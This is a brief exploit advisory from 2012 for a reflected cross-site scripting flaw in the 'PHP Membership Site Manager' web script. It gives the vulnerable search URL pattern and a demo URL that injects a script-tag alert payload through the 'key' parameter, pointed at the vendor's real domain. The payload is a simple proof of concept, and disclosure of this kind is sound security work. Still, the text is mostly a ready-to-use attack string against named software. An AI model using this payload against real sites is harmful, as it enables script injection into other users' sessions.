PHP Membership Site Manager script suffers from a cross site scripting vulnerability.
a9bf3c9de3516a38cd249502932b35eee4325c060a177b654c86686732ea1c57
############################################################################
#
# Exploit Title: PHP Membership Site Manager Script
# Date: 14/01/2012
# Author: Atmon3r
# Discovered By: Atmon3r
# Software Link:
http://www.e-soft24.com/php-membership-site-manager-script-p-74.html
# Version: All Version
# Security Risk:: Low
# Tested on: GNU/Linux Ubuntu
#
############################################################################
#
# Exploit:
#
http://www.website.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss]
#
############################################################################
#
# Demo:
#
http://www.e-soft24.com/scripts/membershipsite/manager/index.php?action=search&key="><script>alert('Xss
By Atm0n3r')</script>
#
############################################################################